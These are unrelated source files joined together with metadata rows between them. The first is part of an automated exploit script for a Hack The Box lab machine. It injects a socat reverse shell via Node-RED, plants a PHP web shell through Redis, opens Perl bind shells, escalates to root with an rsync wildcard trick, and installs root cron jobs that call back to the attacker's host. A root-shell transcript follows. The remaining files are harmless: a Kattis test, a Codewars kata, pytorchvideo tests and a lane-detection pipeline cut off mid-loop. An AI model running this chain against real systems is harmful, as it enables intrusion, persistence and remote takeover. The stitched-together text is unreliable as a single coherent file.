headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/"+uid+"/inject/fae51292.d8e68","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1"}
try:
response = session.post("http://10.10.10.94:1880/red/"+uid+"/inject/fae51292.d8e68", headers=headers)
if response.status_code != 200:
p3.failure("Status "+str(response.status_code))
sys.exit()
else:
p3.success("OK")
except requests.exceptions.RequestException as e:
p3.failure(str(e))
sys.exit()
# Inject nodejs reverse shell
p4 = log.progress("Injecting socat reverse shell via nodejs [" + LHOST + ":" + str(LPORT1) + "]")
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/" + uid + "/inject/6c08c84b.d9c578","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1"}
try:
response = session.post("http://10.10.10.94:1880/red/" + uid + "/inject/6c08c84b.d9c578", headers=headers)
if response.status_code != 200:
p4.failure("Status "+str(response.status_code))
sys.exit()
else:
p4.success("OK")
except requests.exceptions.RequestException as e:
p4.failure(str(e))
sys.exit()
print("What shell do you want?")
print("[1] root@nodered")
print("[2] www-data@www")
print("[3] root@www")
print("[4] root@backup")
print("[5] root@reddish")
print("[6] Exit")
response = None
while response not in ["1", "2", "3", "4", "5", "6"]:
response = raw_input("Please enter a number 1-6: ").strip()
if response == "6":
sys.exit()
try:
threading.Thread(target=send_payloads).start()
except Exception as e:
log.error(str(e))
socat = listen(LPORT1, bindaddr=LHOST, timeout=20).wait_for_connection()
if response == "1":
socat.interactive()
sys.exit()
with log.progress("Uploading " + UUIDNAME + ".php on the www container via redis") as p:
socat.sendline("/bin/echo -ne '*1\\r\\n$8\\r\\nFLUSHALL\\r\\n*3\\r\\n$3\\r\\nSET\\r\\n$1\\r\\n1\\r\\n$45\\r\\n<?php echo shell_exec($_GET[\"e\"].\" 2>&1\"); ?>\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$10\\r\\ndbfilename\\r\\n$12\\r\\n" + UUIDNAME + ".php\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$3\\r\\ndir\\r\\n$46\\r\\n/var/www/html/8924d0549008565c554f8128cd11fda4\\r\\n*1\\r\\n$4\\r\\nSAVE\\r\\n' | " + SOCAT_DSTPATH + " - TCP:redis:6379")
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME+ ".php?e=$(whoami)@$(hostname)END HTTP/1.1\\r\\nHost: nodered\\r\\nUser-agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
output = socat.recvuntil("www-data@www")
if "www-data@www" in output:
p.success("OK (user = www-data@www)")
else:
p.failure("FAIL")
sys.exit()
with log.progress("Sending perl bind shell [www-data@www:" + str(LPORT2) + "] via " + UUIDNAME + ".php & trying to connect") as p:
perl_payload = "perl -e 'use Socket;$p=" + str(LPORT2) +";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};'"
urled_perl_payload = urllib.quote_plus(perl_payload)
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME + ".php?e=" + urled_perl_payload + " HTTP/1.1\\r\\nHost: nodered\\r\\nUser-Agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
socat.sendline(SOCAT_DSTPATH + " file:`tty`,echo=0,rawer TCP:www:" + str(LPORT2))
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "2":
socat.interactive()
sys.exit()
with log.progress("Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run") as p:
socat.sendline('echo "/bin/cp /bin/bash ' + SUBASH_PATH + ';/bin/chmod 4755 ' + SUBASH_PATH + '" > "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/' + UUIDNAME + '.rdb"')
socat.sendline('touch "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/-e sh ' + UUIDNAME + '.rdb"')
count = 0
while True:
p.status(str(count))
sleep(1)
socat.sendline("[ -f " + SUBASH_PATH + " ] && echo 'OK' || echo 'NO'")
socat.recvuntil('$ ')
output = socat.recv(3).strip()
if "OK" in output:
p.success("OK")
break
count += 1
if count > 180:
p.failure("FAIL")
sys.exit()
socat.sendline(SUBASH_PATH + ' -i -p')
socat.sendline("cd /root")
socat.clean(1)
if response == "3":
socat.interactive()
sys.exit()
with log.progress("Sending a cronjob for bind shell [root@backup:" +str(LPORT3)+ "]. Please wait") as p:
socat.sendline("echo 'use Socket;$p=" + str(LPORT3) + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};' > " + CRONPL_PATH + ".pl")
socat.sendline("echo '* * * * * root /usr/bin/perl " + CRONPL_PATH + ".pl' > " + CRONPL_PATH + "cronjob")
socat.sendline("rsync -a " + CRONPL_PATH + ".pl backup::src" + CRONPL_PATH + ".pl")
socat.sendline("rsync -a " + CRONPL_PATH + "cronjob backup::src/etc/cron.d/")
for i in range(62):
p.status(str(61 - i))
time.sleep(1)
socat.sendline("perl -MFcntl=F_SETFL,F_GETFL,O_NONBLOCK -MSocket '-e$0=perl;socket($c,AF_INET,SOCK_STREAM,0)&&connect($c,pack_sockaddr_in("+ str(LPORT3) + ",inet_aton(\"backup\")))||die$!;fcntl$_,F_SETFL,O_NONBLOCK|fcntl$_,F_GETFL,0 for@d=(*STDIN,$c),@e=($c,*STDOUT);L:for(0,1){sysread($d[$_],$f,8**5)||exit and$f[$_].=$f if vec$g,$_*($h=fileno$c),1;substr$f[$_],0,syswrite($e[$_],$f[$_],8**5),\"\";vec($g,$_*$h,1)=($i=length$f[$_]<8**5);vec($j,$_||$h,1)=!!$i}select$g,$j,$k,5;goto L'")
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "4":
socat.interactive()
sys.exit()
with log.progress("Sending reverse shell cronjob [" + LHOST + ":" +str(LPORT4)+ "] for root@host. Please wait") as p:
socat.sendline("mkdir /mnt/sda1")
socat.sendline("mount /dev/sda1 /mnt/sda1")
socat.sendline("cat /mnt/sda1/root/root.txt")
socat.sendline("echo 'import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(LPORT4) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn([\"/bin/bash\",\"-i\"]);s.close();exit();' > /mnt/sda1/tmp/" + UUIDNAME + ".py")
socat.sendline("echo '* * * * * root /usr/bin/python /tmp/" + UUIDNAME + ".py' > /mnt/sda1/etc/cron.d/" + UUIDNAME + "cronjob")
host_shell = listen(LPORT4, bindaddr=LHOST, timeout=65).wait_for_connection()
if host_shell.sock is None:
p.failure("FAIL")
sys.exit()
else:
p.success("OK")
host_shell.interactive()
sys.exit()
'''
$ ./autopwn_reddish.py
What shell do you want?
[1] root@nodered
[2] www-data@www
[3] root@www
[4] root@backup
[5] root@reddish
[6] Exit
Please enter a number 1-6: 5
[+] Getting our id: OK (id = 25af4604ab3402f2bdea796ac32bbcc3)
[+] Trying to bind to 10.10.12.229 on port 60000: Done
[+] Waiting for connections on 10.10.12.229:60000: Got connection from 10.10.10.94 on port 46784
[+] Loading node-red flows: OK
[+] Injecting base64-encoded socat: OK
[+] Injecting socat reverse shell via nodejs [10.10.12.229:60000]: OK
[+] Uploading 1994851d.php on the www container via redis: OK (user = www-data@www)
[+] Sending perl bind shell [www-data@www:61031] via 1994851d.php & trying to connect: OK
[+] Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run: OK
[+] Sending a cronjob for bind shell [root@backup:65104]. Please wait: OK
[+] Sending reverse shell cronjob 10.10.12.229:60001] for root@host. Please wait: OK
[+] Trying to bind to 10.10.12.229 on port 60001: Done
[+] Waiting for connections on 10.10.12.229:60001: Got connection from 10.10.10.94 on port 50432
[*] Switching to interactive mode
root@reddish:~# $
'''
| 53.090909
| 1,448
| 0.611768
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,403
| 0.576199
|
6204c146ab9d8f200d7b8f6e6bb1d0148b8857e7
| 1,735
|
py
|
Python
|
test/test_k_apaxiaaans.py
|
ivanlyon/exercises
|
0792976ae2acb85187b26a52812f9ebdd119b5e8
|
[
"MIT"
] | null | null | null |
test/test_k_apaxiaaans.py
|
ivanlyon/exercises
|
0792976ae2acb85187b26a52812f9ebdd119b5e8
|
[
"MIT"
] | null | null | null |
test/test_k_apaxiaaans.py
|
ivanlyon/exercises
|
0792976ae2acb85187b26a52812f9ebdd119b5e8
|
[
"MIT"
] | null | null | null |
import io
import unittest
from unittest.mock import patch
from kattis import k_apaxiaaans
###############################################################################
class SampleInput(unittest.TestCase):
'''Problem statement sample inputs and outputs'''
def test_sample_input_1(self):
'''Run and assert problem statement sample 1 input and output.'''
inputs = 'robert\n'
outputs = 'robert\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_2(self):
'''Run and assert problem statement sample 2 input and output.'''
inputs = 'rooobert\n'
outputs = 'robert\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_3(self):
'''Run and assert problem statement sample 3 input and output.'''
inputs = 'roooooobertapalaxxxxios\n'
outputs = 'robertapalaxios\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
###############################################################################
if __name__ == '__main__':
unittest.main()
| 36.145833
| 79
| 0.571182
| 1,433
| 0.825937
| 0
| 0
| 0
| 0
| 0
| 0
| 575
| 0.331412
|
6204c171addcdbab6da1839b62dea0022b3b30e5
| 829
|
py
|
Python
|
kata/Greeting My Friends [Arrays].py
|
DJO3/code_wars
|
8e9bc8cd903bfc61dafaf11cb9ff289f469e761f
|
[
"MIT"
] | null | null | null |
kata/Greeting My Friends [Arrays].py
|
DJO3/code_wars
|
8e9bc8cd903bfc61dafaf11cb9ff289f469e761f
|
[
"MIT"
] | null | null | null |
kata/Greeting My Friends [Arrays].py
|
DJO3/code_wars
|
8e9bc8cd903bfc61dafaf11cb9ff289f469e761f
|
[
"MIT"
] | null | null | null |
"""
We give you an Array of friend's list.
Write a function called greeting_for_all_friends that takes one argument, friends.
This method takes an array of friends name and return a greeting messages Array.
Message sample: for the friend "Bilal" we get "Hello, Bilal!"
Rules:
If the argument is null, the method should return null
If the argument is an empty array, the method should return null
If the argument is a valide array of strings, the method should return a hello message for every array entry
"""
import sys
def greeting_for_all_friends(friends):
if friends != None and friends:
greeting = ["Hello, {}!".format(friend) for friend in friends]
return greeting
if __name__ == "__main__":
f = sys.argv[1:]
print(greeting_for_all_friends(f))
# print(greeting_for_all_friends(["Bob"]))
| 28.586207
| 108
| 0.738239
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 577
| 0.696019
|
6204f9cec65f309afe5538b66f4dfe8bac9af897
| 11,469
|
py
|
Python
|
tests/test_transforms.py
|
rushyaP/pytorchvideo
|
875b2df67312f5f4c7d581a332701cc7eca11c14
|
[
"Apache-2.0"
] | 1
|
2021-05-20T21:25:14.000Z
|
2021-05-20T21:25:14.000Z
|
tests/test_transforms.py
|
rushyaP/pytorchvideo
|
875b2df67312f5f4c7d581a332701cc7eca11c14
|
[
"Apache-2.0"
] | null | null | null |
tests/test_transforms.py
|
rushyaP/pytorchvideo
|
875b2df67312f5f4c7d581a332701cc7eca11c14
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import unittest
from collections import Counter
import numpy as np
import torch
from pytorchvideo.data.utils import thwc_to_cthw
from pytorchvideo.transforms import (
ApplyTransformToKey,
Normalize,
OpSampler,
RandomShortSideScale,
UniformCropVideo,
UniformTemporalSubsample,
)
from pytorchvideo.transforms.functional import (
convert_to_one_hot,
uniform_temporal_subsample_repeated,
short_side_scale,
uniform_crop,
uniform_temporal_subsample,
)
from torchvision.transforms import Compose
from torchvision.transforms._transforms_video import (
NormalizeVideo,
RandomCropVideo,
RandomHorizontalFlipVideo,
)
from utils import create_dummy_video_frames
class TestTransforms(unittest.TestCase):
def test_compose_with_video_transforms(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
test_clip = {"video": video, "label": 0}
# Compose using torchvision and pytorchvideo transformst to ensure they interact
# correctly.
num_subsample = 10
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
UniformTemporalSubsample(num_subsample),
NormalizeVideo([video.mean()] * 3, [video.std()] * 3),
RandomShortSideScale(min_size=15, max_size=25),
RandomCropVideo(10),
RandomHorizontalFlipVideo(p=0.5),
]
),
)
]
)
actual = transform(test_clip)
c, t, h, w = actual["video"].shape
self.assertEqual(c, 3)
self.assertEqual(t, num_subsample)
self.assertEqual(h, 10)
self.assertEqual(w, 10)
def test_uniform_temporal_subsample(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
actual = uniform_temporal_subsample(video, video.shape[1])
self.assertTrue(actual.equal(video))
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
actual = uniform_temporal_subsample(video, video.shape[1] // 2)
self.assertTrue(actual.equal(video[:, [0, 2, 4, 6, 8, 10, 12, 14, 16, 19]]))
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
actual = uniform_temporal_subsample(video, 1)
self.assertTrue(actual.equal(video[:, 0:1]))
def test_short_side_scale_width_shorter_pytorch(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 20, 10)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 5, backend="pytorch")
self.assertEqual(actual.shape, (3, 20, 10, 5))
def test_short_side_scale_height_shorter_pytorch(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 10, 20)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 5, backend="pytorch")
self.assertEqual(actual.shape, (3, 20, 5, 10))
def test_short_side_scale_equal_size_pytorch(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 10, 10)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 10, backend="pytorch")
self.assertEqual(actual.shape, (3, 20, 10, 10))
def test_short_side_scale_width_shorter_opencv(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 20, 10)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 5, backend="opencv")
self.assertEqual(actual.shape, (3, 20, 10, 5))
def test_short_side_scale_height_shorter_opencv(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 10, 20)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 5, backend="opencv")
self.assertEqual(actual.shape, (3, 20, 5, 10))
def test_short_side_scale_equal_size_opencv(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 10, 10)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 10, backend="opencv")
self.assertEqual(actual.shape, (3, 20, 10, 10))
def test_torchscriptable_input_output(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
# Test all the torchscriptable tensors.
for transform in [UniformTemporalSubsample(10), RandomShortSideScale(10, 20)]:
transform_script = torch.jit.script(transform)
self.assertTrue(isinstance(transform_script, torch.jit.ScriptModule))
# Seed before each transform to force determinism.
torch.manual_seed(0)
output = transform(video)
torch.manual_seed(0)
script_output = transform_script(video)
self.assertTrue(output.equal(script_output))
def test_uniform_temporal_subsample_repeated(self):
video = thwc_to_cthw(create_dummy_video_frames(32, 10, 10)).to(
dtype=torch.float32
)
actual = uniform_temporal_subsample_repeated(video, (1, 4))
expected_shape = ((3, 32, 10, 10), (3, 8, 10, 10))
for idx in range(len(actual)):
self.assertEqual(actual[idx].shape, expected_shape[idx])
def test_uniform_crop(self):
# For videos with height < width.
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
# Left crop.
actual = uniform_crop(video, size=20, spatial_idx=0)
self.assertTrue(actual.equal(video[:, :, 5:25, :20]))
# Center crop.
actual = uniform_crop(video, size=20, spatial_idx=1)
self.assertTrue(actual.equal(video[:, :, 5:25, 10:30]))
# Right crop.
actual = uniform_crop(video, size=20, spatial_idx=2)
self.assertTrue(actual.equal(video[:, :, 5:25, 20:]))
# For videos with height > width.
video = thwc_to_cthw(create_dummy_video_frames(20, 40, 30)).to(
dtype=torch.float32
)
# Top crop.
actual = uniform_crop(video, size=20, spatial_idx=0)
self.assertTrue(actual.equal(video[:, :, :20, 5:25]))
# Center crop.
actual = uniform_crop(video, size=20, spatial_idx=1)
self.assertTrue(actual.equal(video[:, :, 10:30, 5:25]))
# Bottom crop.
actual = uniform_crop(video, size=20, spatial_idx=2)
self.assertTrue(actual.equal(video[:, :, 20:, 5:25]))
def test_uniform_crop_transform(self):
video = thwc_to_cthw(create_dummy_video_frames(10, 30, 40)).to(
dtype=torch.float32
)
test_clip = {"video": video, "aug_index": 1, "label": 0}
transform = UniformCropVideo(20)
actual = transform(test_clip)
c, t, h, w = actual["video"].shape
self.assertEqual(c, 3)
self.assertEqual(t, 10)
self.assertEqual(h, 20)
self.assertEqual(w, 20)
self.assertTrue(actual["video"].equal(video[:, :, 5:25, 10:30]))
def test_normalize(self):
video = thwc_to_cthw(create_dummy_video_frames(10, 30, 40)).to(
dtype=torch.float32
)
transform = Normalize(video.mean(), video.std())
actual = transform(video)
self.assertAlmostEqual(actual.mean().item(), 0)
self.assertAlmostEqual(actual.std().item(), 1)
def test_convert_to_one_hot(self):
# Test without label smooth.
num_class = 5
num_samples = 10
labels = torch.arange(0, num_samples) % num_class
one_hot = convert_to_one_hot(labels, num_class)
self.assertEqual(one_hot.sum(), num_samples)
label_value = 1.0
for index in range(num_samples):
label = labels[index]
self.assertEqual(one_hot[index][label], label_value)
# Test with label smooth.
labels = torch.arange(0, num_samples) % num_class
label_smooth = 0.1
one_hot_smooth = convert_to_one_hot(
labels, num_class, label_smooth=label_smooth
)
self.assertEqual(one_hot_smooth.sum(), num_samples)
label_value_smooth = 1 - label_smooth + label_smooth / num_class
for index in range(num_samples):
label = labels[index]
self.assertEqual(one_hot_smooth[index][label], label_value_smooth)
def test_OpSampler(self):
# Test with weights.
n_transform = 3
transform_list = [lambda x, i=i: x.fill_(i) for i in range(n_transform)]
transform_weight = [1] * n_transform
transform = OpSampler(transform_list, transform_weight)
input_tensor = torch.rand(1)
out_tensor = transform(input_tensor)
self.assertTrue(out_tensor.sum() in list(range(n_transform)))
# Test without weights.
input_tensor = torch.rand(1)
transform_no_weight = OpSampler(transform_list)
out_tensor = transform_no_weight(input_tensor)
self.assertTrue(out_tensor.sum() in list(range(n_transform)))
# Make sure each transform is sampled without replacement.
transform_op_values = [3, 5, 7]
all_possible_out = [15, 21, 35]
transform_list = [lambda x, i=i: x * i for i in transform_op_values]
test_time = 100
transform_no_replacement = OpSampler(transform_list, num_sample_op=2)
for _ in range(test_time):
input_tensor = torch.ones(1)
out_tensor = transform_no_replacement(input_tensor)
self.assertTrue(out_tensor.sum() in all_possible_out)
# Make sure each transform is sampled with replacement.
transform_op_values = [3, 5, 7]
possible_replacement_out = [9, 25, 49]
input_tensor = torch.ones(1)
transform_list = [lambda x, i=i: x * i for i in transform_op_values]
test_time = 100
transform_no_replacement = OpSampler(
transform_list, replacement=True, num_sample_op=2
)
replace_time = 0
for _ in range(test_time):
input_tensor = torch.ones(1)
out_tensor = transform_no_replacement(input_tensor)
if out_tensor.sum() in possible_replacement_out:
replace_time += 1
self.assertTrue(replace_time > 0)
# Test without weights.
transform_op_values = [3.0, 5.0, 7.0]
input_tensor = torch.ones(1)
transform_list = [lambda x, i=i: x * i for i in transform_op_values]
test_time = 10000
weights = [10.0, 2.0, 1.0]
transform_no_replacement = OpSampler(transform_list, weights)
weight_counter = Counter()
for _ in range(test_time):
input_tensor = torch.ones(1)
out_tensor = transform_no_replacement(input_tensor)
weight_counter[out_tensor.sum().item()] += 1
for index, w in enumerate(weights):
gt_dis = w / sum(weights)
out_key = transform_op_values[index]
self.assertTrue(
np.allclose(weight_counter[out_key] / test_time, gt_dis, rtol=0.2)
)
| 38.35786
| 88
| 0.624553
| 10,686
| 0.931729
| 0
| 0
| 0
| 0
| 0
| 0
| 746
| 0.065045
|
62053e8d0f3189aeee01ea44d5273ade06244a54
| 20,905
|
py
|
Python
|
udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py
|
linksdl/futuretec-project-self_driving_cars_projects
|
38e8f14543132ec86a8bada8d708eefaef23fee8
|
[
"MIT"
] | null | null | null |
udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py
|
linksdl/futuretec-project-self_driving_cars_projects
|
38e8f14543132ec86a8bada8d708eefaef23fee8
|
[
"MIT"
] | null | null | null |
udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py
|
linksdl/futuretec-project-self_driving_cars_projects
|
38e8f14543132ec86a8bada8d708eefaef23fee8
|
[
"MIT"
] | null | null | null |
"""
# !/usr/bin/env python
# -*- coding: utf-8 -*-
@Time : 2022/2/24 20:12
@Author : shengdl999links@gmail.com
@ProjectName : udacity-program_self_driving_car_engineer_v1.0_source.0
@File : full_pipeline.py
"""
import numpy as np
import cv2
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import glob
from moviepy.editor import VideoFileClip
# Load in the chessboard calibration images to a list
cal_image_loc = glob.glob('camera_cal/calibration*.jpg')
# Prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((6 * 9, 3), np.float32)
objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)
# Arrays for later storing object points and image points
obj_points = [] # 3d points in real world space
img_points = [] # 2d points in image plane.
# Make a list of calibration images
calibration_images = []
for im in cal_image_loc:
img = mpimg.imread(im)
calibration_images.append(img)
verbose = False
# Iterate through images for their points
for image in calibration_images:
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
pattern_found, corners = cv2.findChessboardCorners(gray, (9, 6), None)
if pattern_found is True:
obj_points.append(objp)
img_points.append(corners)
if verbose:
# Draw and display the corners
img = cv2.drawChessboardCorners(image, (9, 6), corners, pattern_found)
cv2.imshow('img', img)
cv2.waitKey(500)
if verbose:
cv2.destroyAllWindows()
# Returns camera calibration
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, gray.shape[::-1], None, None)
class Left_Line():
"""
the left line
"""
def __init__(self):
# was the line detected in the last iteration?
self.detected = False
# recent polynomial coefficients
self.recent_fit = []
# polynomial coefficients averaged over the last n iterations
self.best_fit = None
# polynomial coefficients for the most recent fit
self.current_fit = [np.array([False])]
# difference in fit coefficients between last and new fits
self.diffs = np.array([0, 0, 0], dtype='float')
# x values for detected line pixels
self.allx = None
# y values for detected line pixels
self.ally = None
# counter to reset after 5 iterations if issues arise
self.counter = 0
class Right_Line():
"""
the right line
"""
def __init__(self):
# was the line detected in the last iteration?
self.detected = False
# recent polynomial coefficients
self.recent_fit = []
# polynomial coefficients averaged over the last n iterations
self.best_fit = None
# polynomial coefficients for the most recent fit
self.current_fit = [np.array([False])]
# difference in fit coefficients between last and new fits
self.diffs = np.array([0, 0, 0], dtype='float')
# x values for detected line pixels
self.allx = None
# y values for detected line pixels
self.ally = None
# counter to reset after 5 iterations if issues arise
self.counter = 0
def pipeline(img, s_thresh=(125, 255), sx_thresh=(10, 100), R_thresh=(200, 255), sobel_kernel=3):
""" Pipeline to create binary image.
This version uses thresholds on the R & S color channels and Sobelx.
Binary activation occurs where any two of the three are activated.
"""
distorted_img = np.copy(img)
dst = cv2.undistort(distorted_img, mtx, dist, None, mtx)
# Pull R
R = dst[:, :, 0]
# Convert to HLS colorspace
hls = cv2.cvtColor(dst, cv2.COLOR_RGB2HLS).astype(np.float)
h_channel = hls[:, :, 0]
l_channel = hls[:, :, 1]
s_channel = hls[:, :, 2]
# Sobelx - takes the derivate in x, absolute value, then rescale
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
abs_sobelx = np.absolute(sobelx)
scaled_sobelx = np.uint8(255 * abs_sobelx / np.max(abs_sobelx))
# Threshold x gradient
sxbinary = np.zeros_like(scaled_sobelx)
sxbinary[(scaled_sobelx >= sx_thresh[0]) & (scaled_sobelx <= sx_thresh[1])] = 1
# Threshold R color channel
R_binary = np.zeros_like(R)
R_binary[(R >= R_thresh[0]) & (R <= R_thresh[1])] = 1
# Threshold color channel
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
# If two of the three are activated, activate in the binary image
combined_binary = np.zeros_like(sxbinary)
combined_binary[((s_binary == 1) & (sxbinary == 1)) | ((sxbinary == 1) & (R_binary == 1))
| ((s_binary == 1) & (R_binary == 1))] = 1
return combined_binary
def birds_eye(img, mtx, dist):
""" Birds eye first undistorts the image, using the calibration from earlier.
Next, using defined source image points and destination points,
it will transform the image as if the road was viewed from above,
like a bird would see. Returns the birds eye image and transform matrix.
"""
# Put the image through the pipeline to get the binary image
binary_img = pipeline(img)
# Undistort
undist = cv2.undistort(binary_img, mtx, dist, None, mtx)
# Grab the image shape
img_size = (undist.shape[1], undist.shape[0])
# Source points - defined area of lane line edges
src = np.float32([[690, 450], [1110, img_size[1]], [175, img_size[1]], [595, 450]])
# 4 destination points to transfer
offset = 300 # offset for dst points
dst = np.float32([[img_size[0] - offset, 0], [img_size[0] - offset, img_size[1]],
[offset, img_size[1]], [offset, 0]])
# Use cv2.getPerspectiveTransform() to get M, the transform matrix
M = cv2.getPerspectiveTransform(src, dst)
# Use cv2.warpPerspective() to warp the image to a top-down view
top_down = cv2.warpPerspective(undist, M, img_size)
return top_down, M
def count_check(line):
""" Resets to using new sliding windows below if
upon failing five times in a row.
"""
if line.counter >= 5:
line.detected = False
def first_lines(img, mtx, dist):
""" First Lines uses the birds eye image from above,
creates a histogram of where the binary activations occur,
and uses sliding windows along the peak areas to estimate
where the lane lines are.
"""
# Load the birds eye image and transform matrix from birds_eye
binary_warped, perspective_M = birds_eye(img, mtx, dist)
# Histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0] / 2:, :], axis=0)
# Output image an to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0] / 2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# Choose the number of sliding windows
nwindows = 9
# Set height of windows
window_height = np.int(binary_warped.shape[0] / nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated for each window
leftx_current = leftx_base
rightx_current = rightx_base
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window + 1) * window_height
win_y_high = binary_warped.shape[0] - window * window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
# Identify the nonzero pixels in x and y within the window
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (
nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (
nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
